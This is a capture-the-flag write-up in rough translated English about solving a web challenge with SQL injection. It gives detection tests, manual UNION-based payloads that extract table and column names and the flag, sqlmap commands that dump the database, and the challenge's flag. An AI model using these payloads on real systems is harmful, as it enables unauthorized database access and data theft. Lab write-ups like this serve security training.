One 、 analysis

Enter the page , I saw a website , Look at the source code , Web content , Look for a breakthrough , You can scan the directory with Yujian to find a breakthrough , The test found no breakthrough , Try... Try sql Inject .

Two 、 step

1. Test for presence sql Inject

How to determine sql Injection point

1 Single quotation mark judgment

Search box or URL Tail end plus ’ If an error is reported, there may be sql Inject holes , Because character type or Integer types will report errors because the number of single quotes does not match
2, The number type determines whether there is injection
and 1=1           Return to the correct page
and 1=2           Return to error page
3, The character type determines whether there is injection
‘ and ‘1’='1       Return to the correct page
’ and '1'='2        Return to error page

Single quotation mark judgment , You can enter... In the search box ', It can also be in url Add at the end. Note here that post Submit ,why？ Looking at the source code of the initial page, you can find

Already known to exist sql Inject , You can use tools sqlmap. It can also be injected manually

Manual injection ：

1, structure payload：1' order by 3#, For before 1,2,3 Page echo is normal , When it comes to 4 When the page reports an error , Description has three columns of data

2. structure payload：1' union select 1,2,3# Burst the two columns of data injected

3. The injection point is 2,3. structure payload：1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()# Name of the table

 4. structure payload：1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='secret_table'# Pop field

 5. structure payload：' union select 1,2,group_concat(id,0x3a,fl4g) from secret_table# detonation flag

flag：QCTF{sq1_inJec7ion_ezzz}

sqlmap：

bp Capture and save as 1.txt, Put it in kali root Under the table of contents

Carry out orders :sqlmap -r "1.txt" Burst information

Reveal the name of the library , And the user name :sqlmap -r "1.txt" --current-db --current-user

Name of the table ：sqlmap -r "1.txt" --tables -D "news"

Pop field ：sqlmap -r "1.txt" --columns -D "news" -T "secret_table"

detonation flag：sqlmap -r 1.txt -D "news" -T "secret_table"  -C "fl4g" --dump